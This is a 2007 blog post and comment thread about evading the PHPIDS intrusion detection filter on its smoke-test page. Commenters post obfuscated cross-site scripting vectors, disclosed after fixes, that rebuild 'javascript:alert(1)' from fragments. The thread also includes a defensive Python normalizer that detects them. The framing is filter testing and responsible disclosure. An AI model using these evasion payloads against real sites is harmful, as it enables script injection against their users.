I’ve been testing the PHPIDS after Sirdarckcat tempted me with his post.
At first I created two simple vectors to make injection more difficult, then I spent a couple of hours coming up with a full tag and JavaScript injection. I shall post the vector here once they have fixed it, because it is quite dangerous and I don’t want their site open to attack. So if you think you are a good hacker, try to inject some JavaScript on their Smoke test; it isn’t as easy as it first looks.
The Spanner
A tool for designers dealing with programmers dealing with designers…




Comments (21)
I’ve found another serious one. I’ll share when it’s fixed. Here’s the other one I did which has now been fixed:-
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
Posted 04 Sep 2007 at 12:30 pm
Hi!
Great work again - thx a lot! It led me to refactor the converter unit of the PHPIDS and I think I have found a pretty stable beta of the regex to check and de-assemble concatenations.
I am very much looking forward to the 0.4.0 release we are currently working on - the help of you guys is what helps improve it eminently.
Greetz,
.mario
Posted 04 Sep 2007 at 2:57 pm
This is also fixed now:-
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1
Posted 04 Sep 2007 at 2:58 pm
Good work Mario/PHPIDS team, I really admire all your efforts on this because I know how difficult it is to protect against this stuff.
I’ll look forward to hacking it again though
Posted 04 Sep 2007 at 3:01 pm
always appreciated!
Posted 04 Sep 2007 at 3:46 pm
It almost looks like ASCII art, good job!
Posted 04 Sep 2007 at 11:28 pm
Hehe thanks
I might try again soon cause I love an interesting challenge
Posted 05 Sep 2007 at 12:28 am
Found another one (IE only):-
Posted 05 Sep 2007 at 4:50 am
I’ve had to base64 encode it because it causes conversion errors:-
czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVy
JztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=
and another:-
Posted 06 Sep 2007 at 9:04 am
s1=""+"jav"+"";s2=""+"ascri"+"";s3=""+"pt"+"";s4=""==""?':':0;s5=""+"aler"+"";s6=""+"t"+"";s7=""==""?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8
Check this one out, creates javascript: and passes it to the URL property, only works in IE though.
Here’s my favorite:-
Yeah I think this will be an endless arms race
btw do you know the JavaScript functions:
import() and export()? It’s pretty cool cause you can export signed script data if import is called inside a signed script. I didn’t know this, there is a lot more to be learned in JavaScript.
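Every vector in this thread rebuilds javascript:alert(1) from fragments whose value never varies, which is exactly what a converter that de-assembles concatenations has to undo. As an added example (not PHPIDS code, and the `SINKS` set and `inspect` name are my own), this Python normalizer folds the two constant wrappers used above, evaluates the concatenations in order and reports sink assignments whose resolved value looks executable:

```python
import re

# One JS string literal, single- or double-quoted (no escape handling; enough for these vectors).
STR = r"(?:'[^']*'|\"[^\"]*\")"
IDENT = r"[A-Za-z_$][\w$]*"
SINKS = {"URL", "src", "href", "location"}          # properties that load or navigate to a URL
PAYLOAD = re.compile(r"javascript\s*:|alert\s*\(", re.I)


def fold_constants(script):
    """Replace wrappers whose outcome never varies with the literal they yield."""
    # 0 ? '' : 'x'  ->  'x'        (condition is constant false)
    script = re.sub(r"0\?" + STR + r":(" + STR + r")", r"\1", script)
    # "" == "" ? 'x' : 0  ->  'x'  (two empty literals are always equal)
    script = re.sub(STR + "==" + STR + r"\?(" + STR + r"):0", r"\1", script)
    return script


def resolve(script):
    """Evaluate `name = a + 'b' + c` assignments in order; returns {name: value}."""
    env = {}
    for stmt in fold_constants(script).split(";"):   # assumes no ';' inside literals
        m = re.fullmatch(r"\s*(" + IDENT + r"(?:\." + IDENT + r")*)=(.+)", stmt.strip())
        if not m:
            continue
        name, rhs = m.groups()
        parts = re.findall(STR + "|" + IDENT, rhs)    # literals and variable references
        env[name] = "".join(p[1:-1] if p[0] in "'\"" else env.get(p, p) for p in parts)
    return env


def inspect(script):
    """Return {sink: resolved value} for each sink assignment whose value looks executable."""
    return {name: value for name, value in resolve(script).items()
            if name.split(".")[-1] in SINKS and PAYLOAD.search(value)}


# The three vectors posted in this thread, re-typed with straight quotes.
SAMPLES = [
    "s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';"
    "s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';"
    "i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);",
    "s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1",
    's1=""+"jav"+"";s2=""+"ascri"+"";s3=""+"pt"+"";s4=""==""?\':\':0;s5=""+"aler"+"";'
    's6=""+"t"+"";s7=""==""?\'(1)\':0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect(sample))
```

Each sample resolves to a `javascript:alert(1)` assignment to `src` or `URL`; the same folding step is what makes the later `_=alert` and `this[...]` variants in this thread harder, since those no longer depend on string concatenation at all.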
Posted 08 Sep 2007 at 10:45 pm
Nope didn’t know that but sounds cool, I’m gonna google it.
Posted 09 Sep 2007 at 9:03 am
Definitely an arms race, I just can’t see how they can prevent all of it because we can always come up with new ways of doing things.
Still I’m impressed with their filters; it isn’t that easy to come up with new vectors and I’ve done loads of complicated ones which don’t get through.
Posted 09 Sep 2007 at 6:42 pm
I meant:
import function() or var
export function() or var
Like:
function a() {
//foo
}
export a;
misleading stuff I know
Posted 09 Sep 2007 at 9:05 pm
Found any docs on that? I would be interested to read, I tried Mozilla but there’s not much stuff on it.
Posted 09 Sep 2007 at 9:42 pm
It is here:
http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html
Be amazed what the ol’ Netscape can teach us, it’s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.

Posted 10 Sep 2007 at 1:50 am
This one’s awesome
Posted 11 Sep 2007 at 10:09 am
_=alert,1,1,_(1);
This one took ages cause it’s really tough now with their new filters:-
s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
Posted 18 Sep 2007 at 1:34 am
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;